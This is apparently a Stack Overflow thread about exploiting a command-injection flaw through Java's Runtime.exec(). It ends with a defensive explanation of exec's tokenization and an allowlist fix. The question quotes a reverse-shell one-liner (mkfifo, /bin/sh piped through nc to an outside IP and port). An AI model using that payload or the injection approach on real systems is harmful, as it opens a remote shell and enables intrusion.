-2

I have a method like

```java
public String doSomething(String paramString) {
    try {
        // do something with paramString and store it in myNewValue
        return new String(myNewValue, "UTF8");
    } catch blocks...
}
```

Let's say doSomething() finally returns the below string:

{"bash","-c", "rm -f /tmp/backpipe; mkfifo /tmp/backpipe && /bin/sh 0</tmp/backpipe | nc 192.168.0.103 1234 1>/tmp/backpipe"}

Now it is actually an array of strings if you look at it, but since it was returned as a string from doSomething(), it is treated as a String alone and not String[].

Now let's say the above string is stored in str3 as:

String str3 = doSomething();

Now is there any way that using:

Runtime.getRuntime().exec();

str3 can be converted to String[] and passed back to Runtime.getRuntime().exec();

So essentially something like:

Runtime.getRuntime().exec(some java magic here that converts str3 to String[] and then passes this String[] to this exec method itself);

qre0ct
  • Perhaps parse it as JSON and retrieve the results? I think using `exec()` is the wrong tool, unless you are asking how to convert that string into the **output** generated by running what appears to be a `bash` script. – Ted Hopp Aug 26 '16 at 20:40
  • [`String#split`](https://docs.oracle.com/javase/8/docs/api/java/lang/String.html#split-java.lang.String-) – 4castle Aug 26 '16 at 20:40
  • how can this be done with Runtime.getRuntime().exec() ? This is the most essential thing that I need to do. Convert it using the exec() and pass it back to the same exec() itself. – qre0ct Aug 26 '16 at 20:43
  • Why do you need to use `exec()` for this? It seems like trying to use a hammer to inflate a tire. – Ted Hopp Aug 26 '16 at 20:44
  • It looks like you should just refactor `doSomething` so that it returns a `String[]` – 4castle Aug 26 '16 at 20:44
  • Yes. I would agree to it. If I had full control over changing all the code, I would have gone one of the ways you guys have suggested so far. However, this is about a specific case where I can not (not allowed to as per the rules of the game) change the code. I can only play around with the input (i.e. str3) which finally lands up in the exec() and whatever is in str3 (which as you rightly pointed out is a bash shell with some more commands) needs to be executed. Now the exec() itself needs a String[] to function properly and hence all this chaos. – qre0ct Aug 26 '16 at 20:49
  • That still doesn't answer the question of why you need to use `exec()` to convert from a string to a string array. It seems that would be a pre-processing step before calling `exec()`. – Ted Hopp Aug 26 '16 at 20:52
  • So you really want to do something like: `Runtime.getRuntime().exec( [ "/usr/local/bin/convertMyStringToArrayAndExecIt.sh", str3 ], ... )` and write a script in shell to turn str3 into a real command line. But there's a bunch of assumptions in there about what your runtime actually lives on top of. (i.e. Your tags are all wrong :) – Tibrogargan Aug 26 '16 at 20:54
  • @TedHopp Yes. You're right. There is no need to use exec() to do the above. But, I can not change the way the code is functioning. Let me explain it here: So basically it is a security assessment that I am doing of a certain Java application. The application seems to have security loopholes which I am writing an exploit for to demo it to my clients. Now the way I can trigger the vulnerability with the application is by passing only user input (str3) to it which lands in exec() & thus gives me a chance of exploit. Now here, it would not make sense to change the application code itself. Right? – qre0ct Aug 26 '16 at 20:56
  • Which part of your example `doSomething` return value is the user input and what is currently being passed to `exec()`? – Tibrogargan Aug 26 '16 at 20:59
  • Also, there is a version of `exec()` that takes a single `String` command argument instead of a `String[]` command array. Perhaps you can use that. – Ted Hopp Aug 26 '16 at 21:00
  • the user input really is the parameter to the doSomething() which gets manipulated inside the method and finally gets returned back as a String. Now this returned String is what is passed to the exec(). – qre0ct Aug 26 '16 at 21:01
  • @TedHopp again, I can NOT change the code of the app. If I could, I would not bother with the exec() at all. The whole point is that because the app is using this exec() I can execute some arbitrary commands on the user's machine through this. That's how the app is coded. It is vulnerable and is not handling user input properly. – qre0ct Aug 26 '16 at 21:02
  • @geek_ji I was assuming doSomething is manipulating the user input. That's why I asked specifically what part of the return value is the user input. – Tibrogargan Aug 26 '16 at 21:04
  • You need to clarify what (if any) part of this is under your control to change. It sounds from the question that you can at least insert a second call to `exec()`, but your comments suggest otherwise. Either the program passes `str3` directly to `exec()`, or else it doesn't and you have a chance to change the call to `exec()`. Which is it? – Ted Hopp Aug 26 '16 at 21:04
  • user input is paramString. After all the processing that's done on paramString inside doSomething(), the method returns a String which is stored in str3. Now, because paramString was specially crafted, str3 turns out to be the string : {"bash","-c", "rm -f /tmp/backpipe; mkfifo /tmp/backpipe && /bin/sh 0/tmp/backpipe"} Now as per the further flow of the code, exec(str3) is called. Now, because str3 is a String and exec() expects a String[] to function properly, str3 does not get executed by the exec() and instead just throws errors. – qre0ct Aug 26 '16 at 21:11
  • Dude. what is the contents of paramString? – Tibrogargan Aug 26 '16 at 21:11
  • how does that matter? Anyway, it is a cipher text. doSomething() basically just decrypts the cipher and produces plain text bash command : {"bash","-c", "rm -f /tmp/backpipe; mkfifo /tmp/backpipe && /bin/sh 0/tmp/backpipe"} – qre0ct Aug 26 '16 at 21:13
  • It matters a lot. You want to decrypt it into something that can be inserted into that command so it runs correctly. See my answer – Tibrogargan Aug 26 '16 at 21:15
  • So this sounds like an [X-Y problem](http://meta.stackexchange.com/questions/66377/what-is-the-xy-problem). From what you describe, you *cannot* modify `str3` before it is passed to `exec()`. Instead, you want to provide some sort of input that generates an `str3` that can be executed without error by `exec()` and the only thing you control is the (simulated) user input to `doSomething()` (and hence, indirectly, the value of `str3`). Is that about right? – Ted Hopp Aug 26 '16 at 21:20
  • somewhat. So you CAN modify the VALUE of str3 but not its type. The rest of it is perfectly well understood. Please pardon the caps, wanted to use italics like you did, but don't know how to do that. – qre0ct Aug 26 '16 at 21:24
  • Ah. So perhaps you want to convert the string `{"bash","-c","rm ..."}` to the string `bash -c rm ...`. Then you can pass that string to `exec()`. Would that do the job for you? – Ted Hopp Aug 26 '16 at 21:29
  • yes. Ideally that should work. But it doesn't. If I just pass bash -c rm ... as you suggested, it throws an error saying : Cannot run program "{"bash","-c",": error=2, No such file or directory Check this question I posted about it http://stackoverflow.com/questions/39172885/java-runtime-getruntime-exec-unable-to-run-commands/39172939?noredirect=1#comment65689213_39172939 – qre0ct Aug 26 '16 at 21:33
  • The user inputs a string that is decrypted, then manipulated in some undisclosed fashion and inserted somewhere into the return value of the `doSomething` method. You want to know how the user's input string can be modified in some way so that when the return value of `doSomething` is passed to Runtime.exec() it will execute an unintended command. – Tibrogargan Aug 26 '16 at 21:34
  • @Tibrogargan exactly. – qre0ct Aug 26 '16 at 21:47
  • The most important part here, that you seem to be completely discounting, is how `doSomething` manipulates the user input. Without knowing what it's doing to String X to produce String Y it's impossible to determine how X should be modified to produce the result you want. Unless you're saying you already have `doSomething` outputting the string you give as an example? – Tibrogargan Aug 26 '16 at 22:03

1 Answer

-3

You can split the string on `,`, assuming that any string in the array does not contain `,`.

```java
String[] string3 = doSomething(foo).split(",");
```

Anon Ymous
  • And what about the braces around the whole thing? And the quote marks around each string? And commas that might appear inside a string? And handling any escaped quote marks inside the actual quote mark delimiters? – Ted Hopp Aug 26 '16 at 20:46
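The `Cannot run program "{"bash","-c",": error=2` message quoted in the comments follows from how `Runtime.exec(String)` is documented to work: it splits the string on whitespace with `StringTokenizer` and parses neither shell syntax nor Java array-literal syntax. The sketch below is an added example, not code from the question, the answer, or the application being assessed; it reproduces that tokenization on a constructed string and shows the application-side fix, where untrusted input only selects a fixed argument vector. The class name, the `ALLOWED` map and its entries are hypothetical, and `Map.of`/`List.of` need Java 9 or later.

```java
import java.util.*;

public class ExecTokenizationDemo {
    // Mirrors the documented behaviour of Runtime.exec(String): the command is
    // split on whitespace with StringTokenizer; no shell or array syntax is parsed.
    static List<String> tokenizeLikeExec(String command) {
        List<String> tokens = new ArrayList<>();
        StringTokenizer st = new StringTokenizer(command);
        while (st.hasMoreTokens()) {
            tokens.add(st.nextToken());
        }
        return tokens;
    }

    // Hypothetical allowlist: the caller picks an action name, never the argv.
    static final Map<String, List<String>> ALLOWED = Map.of(
            "list-tmp", List.of("ls", "-l", "/tmp"),
            "show-date", List.of("date"));

    // Hardened form: untrusted input only selects a fixed argument vector.
    static ProcessBuilder commandFor(String untrusted) {
        List<String> argv = ALLOWED.get(untrusted);
        if (argv == null) {
            throw new IllegalArgumentException("action not allowed");
        }
        return new ProcessBuilder(argv);
    }

    public static void main(String[] args) {
        // Constructed sample in the same shape as the question's string.
        String str3 = "{\"bash\",\"-c\", \"echo hello\"}";
        List<String> tokens = tokenizeLikeExec(str3);
        // tokens.get(0) is the "program" exec(String) would try to start.
        System.out.println("program = " + tokens.get(0));
        System.out.println("args    = " + tokens.subList(1, tokens.size()));

        // An allowlisted action resolves to its fixed argv (nothing is started here).
        System.out.println(commandFor("show-date").command());
        try {
            commandFor(str3); // anything else is refused before a process exists
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The first token printed is the literal text up to the first space, which is why the operating system reports "No such file or directory" for it.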